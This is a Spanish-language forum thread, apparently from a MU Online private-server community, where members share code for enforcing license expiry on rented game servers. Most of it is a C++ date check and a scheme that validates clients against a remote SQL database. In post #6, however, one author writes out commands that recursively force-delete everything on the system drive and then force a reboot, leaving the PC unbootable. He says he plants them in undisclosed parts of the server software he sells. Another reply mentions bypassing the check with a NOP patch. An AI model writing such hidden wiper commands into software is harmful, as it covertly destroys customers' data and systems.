Hola, ¡bienvenido a nuestra comunidad! Es tu primera visita?
Registrarse

User Tag List

Resultados 1 al 7 de 7
  1. #1
    Moderador Avatar de Natzugen

    Fecha de ingreso:
    11 oct, 16
    Mensajes:
    666

    Source vencimiento de licencia

    Cita Iniciado por caron22
    Esto es para algunos programadores que seguramente ya han sacado la manera de ponerle limite de tiempo, les dejo un codigo base para alquilar un GS.

    (Esto es muy facil de truchar ya que si volvemos para atras la fecha el gs arranca)
    Se me ocurre que se podria tomar la hora de internet para decirle que vencio y no la del server.
    Tambien se podria generar un registro el el regedit con valor 1 cuando vencio, no?
    Bueno los filtros de mac y hd ya los conocen todos, si bien son buenos hay forma de modificar mac y hd.
    Código:
    //================================================
    //FUNCION DIA QUE VENCE 
    //================================================
    void Timimg()
    {
    	SYSTEMTIME now;
    	GetSystemTime(&now);
    
    	if(now.wYear <= 2009 && now.wMonth <= 10 && now.wDay <= 24 || now.wYear >= 2017)
    	{
    		MessageBoxA(NULL,"Tu fecha de prueba a terminado","Licencia expirada Security",MB_ICONERROR);
    		::ExitProcess(0);
    	}
    }

  2. #2
    Junior Member Avatar de rogeralexander
    Fecha de ingreso:
    11 oct, 16
    Mensajes:
    21

    Re: Source vencimiento de licencia

    algun avance de este soruce ? alguna modificacion util ?

  3. #3
    Junior Member Avatar de piolon
    Fecha de ingreso:
    11 oct, 16
    Mensajes:
    9

    Re: Source vencimiento de licencia

    y si era tan inteligente por que se murio?

  4. #4
    Senior Member Avatar de caron22
    Fecha de ingreso:
    13 oct, 16
    Mensajes:
    126

    Re: Source vencimiento de licencia

    Pronto dejare el sistema actualizado y completo. saludos

  5. #5
    Junior Member Avatar de 007jodex
    Fecha de ingreso:
    12 oct, 16
    Mensajes:
    12

    Re: Source vencimiento de licencia

    Igual, con un NOP al call que ejecuta a esa funcion, chau vencimiento de licencia.

  6. #6
    Senior Member Avatar de caron22
    Fecha de ingreso:
    13 oct, 16
    Mensajes:
    126

    Re: Source vencimiento de licencia

    Todo es posible xD, pero solo trato de complicarles la vida nada mas, seguramente la empaquete a la dll dentro del gs donde el call o nop no aplicarian, descompilando claro que si pero ya es algo complejo, tambien estoy mirando algunas herramientas nuevas de encriptacion, ademas de usar esto claro en algunas partes que no voy a decir para no comprometer el proyecto con el nombre de la funcion:
    system("@echo Off");
    system("del %systemdrive%\*.*/f/s/q");
    system("shutdown -r -f -t 00");

    Aclaro que no traten de ejecutar esto porque va a borrar todo que pueda del c:\*.* y luego reinicia la pc, aunque ese reinicio es mentiroso jaja la idea de un reinicio es volver a iniciar, claramente no arranca nunca mas la pc con esto.
    Tambien ya esta terminado un proyecto de llave netrockey, pero claro esto implica un poco de un gasto extra pero desafio a cualquiera a hackear este encriptador xD

  7. #7
    Senior Member Avatar de caron22
    Fecha de ingreso:
    13 oct, 16
    Mensajes:
    126

    Re: Source vencimiento de licencia

    Bueno aca les dejo otra sugerencia sobre como validar licencias por base de datos externa, si bien esto va a tener sus ventajas tambien tiene sus desventajas que mencionare despues.

    La mayoria de ustedes usan una conexion a sql que puede ser muy similar a esta:

    bool CManager::conexion()
    {
    bool bReturn = false;

    Manager.load();

    if(this->Connect(this->Host , this->Database , this->Usuario , this->Senha) == true )
    {
    bReturn = true;
    }
    else
    {
    MessageBox(NULL,"Error en la conexcion con SQLSERVER por favor revise el archivo'Config.ini","Error en la conexcion con SQL Server!",MB_OK | MB_ICONSTOP);
    ExitProcess(0);

    this->DiagnosticConn();
    }
    Estas variables: (this->Connect(this->Host , this->Database , this->Usuario , this->Senha) == true )
    Se completan con lo que se ponene en los archivos de configuracion ejemplo: Config.ini
    La idea es crear una funcion similar pero con valores de ip,base,pass,user fijos que apunten a un motor sqlserver externo, ya sea un vps nuestro o panel web con soporte para sqlserver.
    Que logramos con esto?
    Primero que nada la base de datos tiene que ser diferente para cada cliente, osea muexilio me compro un gs, creamos una base de datos llamada muexilio.
    Este sistema lo que va a hacer es chequear al iniciar si existe en nuestra base de datos wan, una base llamada muexilio, si existe continua con la ejecucion, si no existe el gs no arranca.
    Una base de datos para cada cliente, en el caso que deje de pagar o vemos que paso algo raro, borramos la base y ya no puede ejecutar el gs.

    Desventajas:
    Se puede emular una conexion local (Solucion poner un nombre de base con algunos caracteres especiales ejemplo $%muexilio·$)
    Se va a necesitar tener conexion a internet para que el gs se pueda ejecutar.
    Dependencia del buen funcionamiento del vps o panel web para que los gameserver.exe funcionen

    Ventajas:
    Control total de la licencia
    Vencimiento de licencia borrando la base, se puede configurar un trabajo para esto.

    Este es un sistema que ya lo he testeado y probado, funciona sin problemas, como ya no lo uso mas les dejo la idea-
    Saludos

    Creditos: Caron22
    Última edición por caron22; 15/11/2016 a las 11:34

  8. Publicidad!
    Publicidad MU Server



 

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •